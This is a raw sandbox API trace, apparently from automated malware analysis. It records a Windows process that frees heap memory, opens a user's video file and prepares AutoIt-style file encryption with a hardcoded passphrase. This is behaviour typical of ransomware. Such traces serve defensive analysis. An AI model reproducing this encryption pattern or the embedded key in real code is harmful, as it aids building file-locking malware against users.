hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0102.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0102.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0102.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0102.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0102.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0102.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0102.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0102.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0102.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0102.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0102.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0102.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0102.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0102.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0102.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0102.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0102.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0102.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0102.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0102.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0102.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0102.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0102.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0102.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0102.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0102.368] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0102.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.368] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cab08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0102.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0102.368] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0102.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0102.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0102.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0102.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0102.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0102.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0102.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0102.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0102.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0102.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0102.369] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\s4MXeg0Vr.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\jyno5ncyig2nrd\\s4mxeg0vr.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0102.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0102.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0102.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0102.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0102.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0102.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0102.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0102.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0102.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0102.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0102.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0102.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0102.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0102.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0102.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0102.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0102.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0102.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0102.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0102.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0102.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0102.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0102.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0102.466] FreeLibrary (hLibModule=0x772d0000) returned 1 [0102.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0102.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0102.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0102.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0102.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0102.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0102.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0102.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0102.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0102.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0102.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0102.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0102.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0102.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0102.468] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0102.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0102.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0102.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0102.468] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0102.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0102.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0102.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0102.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0102.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0102.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0102.468] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0102.469] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0102.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0102.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0102.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0102.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0102.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0102.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0102.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0102.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0102.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0102.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0102.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0102.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0102.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0102.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0102.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0102.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0102.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0102.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0102.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0102.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0102.469] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0102.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0102.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0102.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0102.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0102.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0102.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0102.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0102.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0102.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0102.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0102.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0102.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0102.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7a58 | out: hHeap=0x1780000) returned 1 [0102.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0102.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0102.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0102.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0102.470] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0102.470] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0102.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca718, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0102.471] CloseHandle (hObject=0x258) returned 1 [0102.471] FreeLibrary (hLibModule=0x772d0000) returned 1 [0102.471] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0102.471] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\jyNO5NcyIG2nrd\\s4MXeg0Vr.avi", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55e2cc60, ftCreationTime.dwHighDateTime=0x1d5e114, ftLastAccessTime.dwLowDateTime=0x5ea9f620, ftLastAccessTime.dwHighDateTime=0x1d5e493, ftLastWriteTime.dwLowDateTime=0x5ea9f620, ftLastWriteTime.dwHighDateTime=0x1d5e493, nFileSizeHigh=0x0, nFileSizeLow=0x5fd0, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="s4MXeg0Vr.avi", cAlternateFileName="S4MXEG~1.AVI")) returned 0x41ac780 [0102.472] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0102.472] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0102.472] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0102.472] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0102.472] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.472] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0102.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0102.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0102.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0102.472] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a5360) returned 1 [0102.473] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0102.473] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0102.473] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0102.473] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0102.473] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0102.474] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0102.474] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0102.474] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0102.474] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0102.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0102.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cacb8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0102.474] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e070 | out: phHash=0x144e070) returned 1 [0102.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0102.474] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0102.474] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0102.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0102.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0102.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0102.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0102.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0102.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0102.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0102.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0102.475] 